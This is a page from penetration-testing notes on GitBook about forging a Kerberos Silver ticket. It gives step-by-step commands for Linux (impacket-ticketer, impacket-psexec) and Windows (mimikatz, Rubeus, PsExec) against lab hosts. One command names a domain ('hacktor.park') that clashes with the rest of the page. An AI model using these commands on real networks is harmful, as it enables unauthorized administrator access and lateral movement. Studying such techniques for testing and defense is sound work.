0Sec
Elite
Elite0Sec
Elite
Elite0Sec
  • 🥷Whoami
  • 🔐Web_AppSec
    • 😀Reconnaissance
      • Scope
      • Methodology v1.0
    • Features Abuse
      • 2FA
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
    • Technologies
      • WordPress
    • Information Disclosure
    • CSRF
    • CRLF Injection
    • Forgot Password
    • Account Takeover
    • LFI & RFI
    • OAuth Misconfiguration
    • Open Redirect
    • SQL injection
    • SSRF
    • Web Cache Deception
    • Web Cache Poisoning
    • Web AppSec Nots
    • Broken Link Injection
    • Checklist
    • Checklist 1.1
  • 🥷Network-pentest
    • Recon
    • Windows Privilege Escalation
    • Active Directory
      • AD Enumeration
        • Users, Computer, Groups
        • BloodHound Enumeration
        • Credentials
        • Credential Dumping
        • PRIVILEGE ESCALATION
      • AD Techniques
        • MSSQL Injection
        • MSSQL AD Abuse
        • Linked Server Exploitation
        • Domain privEsc
          • Kerberos brute-force
          • AS-REP Roasting
          • Kerberoasting
          • Kerberos Unconstrained Delegation
          • Kerberos Constrained Delegation
          • PTH, PTT, Overpth, ptk
          • Silver ticket
          • Golden ticket
          • LLMNR Attack
      • AD Cheat Sheet
    • Red Team Note
    • Notes
Powered by GitBook
On this page
  • Linux
  • Windows
  1. Network-pentest
  2. Active Directory
  3. AD Techniques
  4. Domain privEsc

Silver ticket

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of a user account is owned. Thus, it is possible to gain access to that service by forging a custom TGS with the maximum privileges inside it.

In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service.

Create Specification Ticket for Service

silver (nthash + sid + username + password)

Linux

impacket-ticketer -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain hacktor.park -spn cifs/labwws02.jurassic.park  stegosaurus

export KRB5CCNAME=/root/stegosaurus.ccache

impacket-psexec jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass

Execution is similar to PTT attacks, but in this case the ticket is created manually. After that, as usual, it is possible to set the ticket in the KRB5CCNAME environment variable and use it with the -no-pass -k parameters in any of the impacket examples.

Windows

.\mimikatz.exe

privilege::debug

kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
exit
.\Rubeus.exe ptt /ticket:ticket.kirbi
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

Additionally, the Mimikatz module kerberos::ptt can be used to inject the ticket instead of using Rubeus, as shown in the PTT attack section.

PreviousPTH, PTT, Overpth, ptkNextGolden ticket

Last updated 7 months ago

🥷